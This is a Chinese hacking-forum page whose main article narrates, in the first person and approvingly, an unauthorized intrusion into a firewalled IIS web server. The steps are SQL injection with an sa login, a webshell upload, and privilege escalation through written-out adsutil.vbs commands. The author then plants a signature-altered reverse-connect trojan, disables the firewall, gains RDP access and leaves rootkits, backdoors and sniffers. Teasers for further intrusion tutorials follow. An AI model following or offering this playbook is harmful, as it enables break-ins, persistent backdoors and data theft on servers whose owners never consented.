对有防火墙主机的入侵渗透
所属分类:
网络安全 / 黑客入侵
阅读数:
152
收藏 0赞 0分享
一、踩点
ping
[url=http://www.xxx.com]www.xxx.com[/url]
发现超时,可以是有防火墙或做了策略。再用superscan扫一下,发现开放的端口有很多个,初步估计是软件防火墙。
二、注入
从源文件里搜索关键字asp,找到了一个注入点。用nbsi注入,发现是sa口令登陆,去加了一个用户,显示命令完成。哈哈,看来管理员太粗心了。先上传一个webshell,上传了一个老兵的asp木马,接下来的就是个人习惯了,我平时入侵的习惯是先上传webshell,然后再把webshell提升为system权限,因为这样说可以说在入侵之时会非常的方便,我个人觉得这个方法非常好。
三、提升权限
先看哪些特权的:
cscript C:\Inetpub\AdminScripts\adsutil.vbs get /W3SVC/InProcessIsapiApps
得到:
Microsoft (R) Windows 脚本宿主版本 5.1 for Windows
版权所有(C) Microsoft Corporation 1996-1999. All rights reserved.
InProcessIsapiApps : (LIST) (5 Items)
"C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll"
"C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll"
"C:\WINNT\system32\msw3prt.dll"
把把asp.dll加进去:
cscript C:\Inetpub\AdminScripts\adsutil.vbs
set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32
\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32
\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32
\inetsrv\asp.dll"
然后用asp木马加个用户,显示命令完成。
四、TerminalService
接下来就是开3389了,用net start显示,发现已开了TS服务,但端口上没有3389,觉得可能是改端口了,但事实上它们欺骗我的感情。
我用netstat -an察看了一下,发现有3389,再从net start 里发现是对方的防火墙搞的鬼。算了,上传个木马吧,上传了一个改了特征码的20CN反弹木马。然后用木马在GUI 下关掉了防火墙,再用3389登陆器登了上去。这里我这样做是因为我知道管理员一定不会在旁边,而对于这个时候,比较老道的方法大家可以用fpipe实现端口重定向,或者用httptunnel,和黑防里面说的那样,不过我试过没有成功过一次。还有一种工具是despoxy,(TCP tunnel for HTTP Proxies),大家有兴趣的话可以去试一下,它可以穿透http代理。
五、简单后门
1、改了FSO名,这样是让我自己享受,这个有system权限的马儿。
2、放了几个rootkit和几个网络上少见的后台。
3、我个从是不喜欢多放后台,觉得很烦。
六、sniffer
1.TS界面下,down了些嗅探器。先ARPsniffer图形的看了一下,没有一台内网机子。又看了一个外网,整个IP段都是。看来我的运行不错嘛。打开webdavscan查了一下,只有两三个IP是网站,而且是很小型的,接下来就没有什么动力了。
黑客谈MS07-029域名DNS漏洞利用入侵过程
前言:
MS07-029,Windows 域名系统 (DNS) 服务器服务的远程过程调用 (RPC) 管理接口中存在基于堆栈的缓冲区溢出。漏洞的前提是没打补丁,开启DNS服务的所有版本WINDOWS 2000 Server和WINDOWS 2003 Server。
今天
收藏 0赞 0分享
黑客教你SQL注入Access导出WebShell的方法
热 点:
已经听N个人过说有人已经发现SQL注入Access得到webshell的技术了,也只是听说而已,具体的细节还是不得而知。
最近在看的书中一章提到Jet的安全,然后灵光一闪,呵呵,发现了一种可以利用access导出asp的方法,分享之。
收藏 0赞 0分享
一个注射点,一个webshell甚至系统权限
————只要给我一个注射点,无论什么权限,我都给你一个webshell甚至系统权限
声明:本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责。因为
发觉其危害过大,原文已经经过大量删减及修改,即使这样本文的危害性
收藏 0赞 0分享
黑客实战:一次简单脚本攻击实例
一、开篇
今天闲着无聊,到本地区的一个社区上转转,那些人污言秽语的,有个帖子还侵犯了一个朋友的版权,跟贴说了那人几句,管理员也不管,实在看不下去了,打算给管理员盆冷水清醒清醒。
二、准备/分析
安全第一,先开个HTTP代理,打开社区的登陆页面,
收藏 0赞 0分享
eWebEditor编辑器成网站中的隐形炸弹
站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这
收藏 0赞 0分享
系统泄露密码的入侵攻击分析
WINDOWS访问139端口时自动用当前用户、密码连接,造成泄露用户密码,虽然其密码是加密的,但一样可以用来攻击。
下面是SMB的密码认证方式。
WINDOWS的139口的访问过程,箭头表示数据方向:
1.客户端<---------------
收藏 0赞 0分享
看看黑客是怎样使用Google黑掉Windows服务器
在我的《为什么使用Google扫描安全漏洞》的技巧中,我讨论了如何使用Google.com来执行对你的面向公众的服务器的安全扫描――包括Windows、IIS、Apache和(但愿不会如此!)SQL Server。你能使用它得到服务器的信息、包含敏感信息的文件和检测出&ldquo
收藏 0赞 0分享
查看更多